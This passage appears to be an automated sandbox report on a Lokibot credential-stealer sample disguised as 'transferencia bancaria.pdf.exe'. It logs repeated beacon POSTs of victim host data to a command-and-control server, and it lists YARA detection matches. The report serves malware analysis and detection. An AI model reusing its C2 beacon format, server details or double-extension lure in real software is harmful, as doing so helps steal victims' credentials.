                                      Nov 3, 2022 12:31:32.671320915 CET149INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:32 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      32192.168.2.64973891.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:33.019427061 CET150OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:33.329691887 CET150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:33.642221928 CET151OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:35.287070036 CET151INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:34 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      33192.168.2.64973991.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:35.606376886 CET152OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:35.668613911 CET152OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:37.318947077 CET152INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:36 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      34192.168.2.64974091.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:37.627027035 CET153OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:37.939471960 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:38.251959085 CET154OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:39.620075941 CET154INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:39 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      35192.168.2.64974191.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:39.946872950 CET155OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:40.008711100 CET155OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:40.314831972 CET156OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:41.587642908 CET156INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:41 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      36192.168.2.64974291.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:41.893270016 CET157OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:41.955784082 CET157OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:43.475625992 CET157INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:43 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      37192.168.2.64974391.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:43.782644987 CET158OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:43.846440077 CET158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:45.271881104 CET159INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:44 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      38192.168.2.64974491.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:45.577785969 CET160OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:45.639533043 CET160OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:47.249314070 CET160INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:46 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      39192.168.2.64974591.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:50.569101095 CET161OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:50.631377935 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:52.163666964 CET162INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:51 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      4192.168.2.64971091.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:18.297576904 CET104OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:18.359889030 CET104OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:18.666949987 CET104OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:19.791138887 CET104INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:19 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      5192.168.2.64971191.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:20.264286041 CET105OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:20.327415943 CET106OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:21.541560888 CET106INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:21 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      6192.168.2.64971291.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:22.162497044 CET107OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:22.224951029 CET107OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:23.556931019 CET107INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:23 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      7192.168.2.64971391.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:25.414439917 CET108OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:25.476478100 CET108OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:26.998667002 CET109INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:26 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      8192.168.2.64971491.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:27.432236910 CET110OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:27.493982077 CET110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:27.886517048 CET110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:28.386557102 CET110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:29.899760008 CET111INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:28 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      9192.168.2.64971591.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:31.132672071 CET111OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:31.195020914 CET112OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:32.611166954 CET112INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:32 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:12:29:47
                                      Start date:03/11/2022
                                      Path:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Imagebase:0xf40000
                                      File size:811008 bytes
                                      MD5 hash:355EFB2E1F7DD361F8E7CDA449A45EAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
